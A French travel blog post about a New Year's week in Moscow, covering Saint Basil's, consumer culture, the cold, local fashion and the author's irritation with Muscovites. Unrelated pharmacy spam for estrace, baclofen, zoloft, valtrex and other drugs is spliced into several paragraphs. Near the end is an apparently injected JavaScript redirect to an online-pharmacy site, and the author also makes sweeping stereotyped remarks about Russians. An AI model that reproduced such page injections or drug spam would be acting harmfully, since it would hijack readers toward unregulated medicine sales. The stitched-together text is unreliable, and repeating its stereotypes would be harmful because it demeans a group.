Une caractérielle à Moscou !

5 janvier 2010 par  
Classé dans A la Une, Lifestyle, Voyages

moscou

Une semaine à Moscou … Un rêve de gamine, quand j’avais 4-5 ans je voulais aller voir les palais avec les toits en sucette, à savoir St Basile et ses dômes multicolores.
Rêve réalisé puisque j’ai passé le réveillon à Moscou, dans un appartement donnant sur St Basile.

st-basile

buy estrace online, cost of estrace pills , estradiol pills cost in india.

Pas facile d’expliquer ce que ça m’a fait d’être là-bas.
Déjà parce que Moscou ne correspond pas à l’image que j’en avais.

Consommation à toute vitesse, extrême richesse, très américanisé dans la consommation (beaucoup d’équivalents des malls, des Starbucks, Mc Do et Pizza Hut partout) et très français aussi (Promod, Yves Rocher, Café Coton) et même TopShop, sans parler de la présence, à 95% , de marques françaises au rayon cosméto ! On a l’impression d’être dans une ville américaine si on se base seulement sur les boutiques ou en regardant les Moscovites !

J’avais en tête ce qui est en fait le  Moscou d’ il y a 10 ans, avec ses Lada …
Bref, j’avais loupé un wagon, et pas des moindres.

Mais ça n’a pas gâché mon plaisir, parce que Moscou c’est l’une des plus belles villes que j’ai visité, parce que c’est une ville pleine de surprises !

chapelle3

apr 2, 2014 – low cost baclofen 25mg is it securely to order online. buy baclofen soft tabs uk : where is the best place to buy baclofen online.

Des chapelles avec des dômes partout, au milieu des tours et des chantiers, des chapelles qui auraient poussé comme des champignons, des taches des couleurs au milieu de la grisaille et de la pollution, c’est assez surréaliste.

C’est d’ailleurs le mot qui me vient spontanément pour parler de mon séjour : « Surréaliste ».

20 cm de neige  rarement plus de -5° et pourtant, des filles en mini jupes en  bottes à talons aiguilles, des filles splendides accrochées aux bras d’hommes insignifiants, dans le meilleur des cas. Parce qu’il faut le savoir, la femme russe est aussi belle que l’homme russe est laid. Vraiment, sans être méchante ou sans prendre Brad Pitt en modèle, mais c’est assez … surréaliste, encore une fois !

Un froid polaire et des marchands de glaces, des appartements surchauffés : les moscovites seraient en fait de gros frileux !

advice cipro online purchase order zoloft online now supporters with mdr-tb should be owed in use prescribers, xenical price south africa if other. actually the

Moi qui suis particulièrement frileuse j’ai vraiment eu du mal avec les chauffages impossible à régler à Moscou – dans les appartements, on ne peut pas régler le chauffage, c’est surchauffé, les fruits pourrissent en deux jours et autant vous dire qu’il faut très vite enlever les 4 couches de t-shirt/pull/polaire/doudoune qu’on a sur le dos en rentrant !

Des halls d’immeuble quasi insalubre dont les portes donnent sur des appartements luxueux, des chantiers à cœur ouvert avec, juste à côté, des chapelles où se croisent vieilles moscovites et jeunesse « dorée », bling-bling et  babouchkas …

Les femmes de Moscou ont une classe folle. Toutes en manteau de fourrure (et pourtant, la fourrure et moi …), toutes sur des talons vertigineux, ultra-féminines, qui n’hésitent pas à se repoudrer le nez dès qu’elles croisent un miroir. Elles sont belles, et elles le savent !

filles

C’est simple, je ne me suis jamais sentie aussi moche qu’à Moscou. A -10°, avec ma doudoune, ma chapka, mes chaussures de neige, mon nez rouge et mon leggin sous mon jean, je ne ressemblais à rien. Et Moscou, même s’il y fait un froid polaire, ça n’est pas une station de ski, toutes les femmes ne se trimballent donc pas comme moi, autant dire que quand je voyais passer les jolies poupées fières comme des poux, emmitouflées dans leur fourrure, ça me foutait vraiment un coup au moral ! (bon, astuce pour celles qui partiraient à Moscou prochainement, regardez les générations au-dessus, les mères de ces filles splendides, apparemment après 35 ans, ça se dégrade très vite!)

Je voulais prendre des photos de ces jolies poupées, mais les moscovites ne sont vraiment pas faciles, impossible de les prendre en photo, et comme je ne parle pas un mot de russe, difficile d’expliquer  …

Parce que les russes, en tous cas ceux de Moscou, sont vraiment très spéciaux. Pour moi, c’est du manque de politesse, de respect, d’éducation, mais apparemment c’est dans leur culture d’être « comme ça ».

Pousser dans les files d’attente, se coller à toi, te souffler dessus, te passer devant, ne pas te regarder quand tu passes une commande au restaurant, s’obstiner à parler russe quand tu essaies le combo anglais/français/espagnol, rien ne marche, et rien ne fait peur au Moscovite. Moi qui suis d’habitude assez patiente, j’ai vraiment cru que j’allais m’énerver, ça a parfois gâché la magie de Moscou. Quand un flic te fait faire 2 fois le tour du Kremlin, une fois pour entrer, une fois pour poser ton sac alors que les russes passent directement AVEC leurs sacs,  qu’il te demande d’enlever ta ceinture, ton manteau dehors pour passer au détecteur de métaux alors que le russe derrière toi fait carillonner tous les détecteurs et qu’il passe sans problème, c’est dur de garder son calme. Mais bon, la barrière de la langue et l’historique des flics russes m’ont fait tenir !

Moscou, ça doit être comme Paris : mieux sans ses habitants ! 😉

buy valtrex online, valtrex side effects ,valtrex uses ,valtrex interaction ,valtrex

Bientôt, la suite, avec le moscovite romantique, le problème capillaire du moscovite et  les poupées russes !

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !